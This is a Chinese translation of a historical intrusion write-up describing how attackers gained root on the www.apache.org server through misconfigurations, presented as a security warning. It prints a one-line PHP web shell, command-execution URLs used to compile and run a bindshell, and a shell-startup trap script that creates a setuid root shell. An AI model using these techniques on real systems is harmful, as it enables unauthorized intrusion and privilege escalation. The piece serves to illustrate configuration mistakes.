分享
 
 
 

我们是如何攻破www.apache.org的

王朝system·作者佚名  2008-05-18
窄屏简体版  字體: |||超大  

by {} and Hardbeat

译: quack

一、写在前面

这篇文章并不是发现了什么最新的漏洞,它只是指出了一个普通的配置错误--甚至连apache.org的工作人员也会配置错误:),所以这只是一个警告:修补你的系统,才能防止恶意侵袭。

二、介绍

这里描述了我们如何在一周内成功地得到了运行www.apache.org的机器的root权限并且将其主页面上的Powered by Apache图样(羽毛状的图画)改成了Powered by Microsoft BackOffice的图样,没有做其它的任何改动了--除了帮他们赶跑了另外(可能是恶意)的入侵者。

这里所描述的漏洞甚至不是apache相关的,它们仅仅是配置失误,其中之一是BugZilla的……但它的开发者在README文件中对配置方法做了详尽的描述,所以——一切只能是使用者自己的责任了,apache的用户不必为此而担心的:)。

我们对www.apache.org进行尝试的原因是有太多的服务器上跑的都是阿帕奇了,如果它的主机是不安全的,那么入侵者就可能在它的源代码里放置后门,这会危及许多用户的利益。

当然我们不愿看到这种事发生,所以我们帮apache补上了漏洞——当然在得到了ROOT权限之后我们无法控制自己更改主页的欲望:),开个小玩笑吧。

以下是整个入侵的过程:

1、ftproot == wwwroot

o+w dirs

在寻找apache httpserver想要查看新版本是否存在缓冲溢出的过程中——我们连接上了ftp:/ftp.apache.org——和http://www.apache.org是同一个目录并且有一个可写的目录存在!

于是我们写了一个小脚本wuh.php3包含了下面的语句:

passthru($cmd);

?>

将它上传到了那个可写的目录中。

2、Our commands executed

所以,很方便的,id这个命令可以被下面的语句调用:

http://www.apache.org/thatdir/wuh.php3?cmd=id

而后再上传一些bindshell的程序并用类似

http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c

的语句来编译它,然后执行……

http://www.apache.org/thatdir/wuh.php3?cmd=./httpd

3、The shell

我们使用的bindshell程序是有密码验证的:),相对安全一些。

现在我们可以telnet到端口65533——我们定义的端口绑定处了,这样我们得到了本地nobody权限的进入权——因为cgi是以nobody身份运行的。

4、The apache.org box

在apache.org的机器里我们发现了:

-o=rx /root

-o=rx homedirs

apache.org运行的是freebsd3.4的平台,我们不想仅仅通过缓冲区溢出或者乱七八糟的exploit来得到root,让我们来试试仅仅通过他们自己配置的漏洞来得到最高权限吧!

5、Mysql

经过长时间的搜索,我们发现mysql是以root的权限运行的,并且可以本地运行,因为apache.org还运行了bugzilla需要mysql帐号,并且将其用户名/密码明文存放,所以很轻易的就可以获得mysql数据库的帐号密码。

我们下载了nportredird(从名字就可以知道应该是端口重定向的工具了),并设置成允许我的IP从23306端口接入并且重定向到本地的3306端口——这样我就能使用我的mysql客户端了。

6、完全控制mysql,用它来建立文件

通过3306端口进入后,用bugs的帐号进入——BugZilla默认安装带来的安全问题之一吧……

包括以root身份运行mysqld……。

用\SELECT ... INTO OUTFILE;\的方法,我们可以在任何地方以root的身份建立文件,这些文件将是666权限的,无法覆盖其它文件,但它仍然是有用的,你准备如何利用它呢?无法用.rhosts——任何人可读的.rhosts,rshd是不允许连接运行的,所以rsh无法利用。

7、添加/root/.tcshrc

于是我们决定给他下个套:),于是我们在root的文件夹建立一个文件/root/.tcshrc

#!/bin/sh

cp /bin/sh /tmp/.rootsh

chmod 4755 /tmp/.rootsh

rm -f /root/.tcshrc

8、ROOT!!

就这么简单,现在我们可以等待某人来运行su了,很幸运的——我们没有等太久,就得到了一个suid的shell,成为root后的事情也是同样微不足道的——更改主页并且给主机的管理员发送了Email通知了存在的漏洞。

9、修补ftproot==wwwroot的漏洞

进入系统后我们做的另一件是建立ftproot,将dist移至ftproot/dist并且将ftproot指向这个目录,将可写的目录更改成入侵者无法利用的,保持FTP服务不变……

10、我们可以做什么?

还记得去年发生在ftp.win.tue.nl的事吗?有人在tcp_wrappers里放了木马:),如果我们想这么做的话,就可以将木马放在阿帕奇里——编辑源程序并让大家来下载这个有木马后门的版本,很刺激,不是吗:)

11、简要回顾:

发现ftproot==webroot--->可写的目录允许上传php3脚本--->mysqld以root运行,而且缺乏密码保护……这就是配置错误所在了。

好了……一切顺利:)

---------------------------------------------------

译者注:

诚如作者所言,他们并没有利用什么最新漏洞,而仅仅是通过对webserver和数据库的一些不当配置的利用,得到了系统的最高权限——事情还是发生在apache!呵,听来有些夸张,但国内的情况呢……如果您关注系统安全的话,应该能知道的:(,不知道某些手握大权的系统管理员们会不会多留点心……

敬请高手指点:mailto quack@antionline.org

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有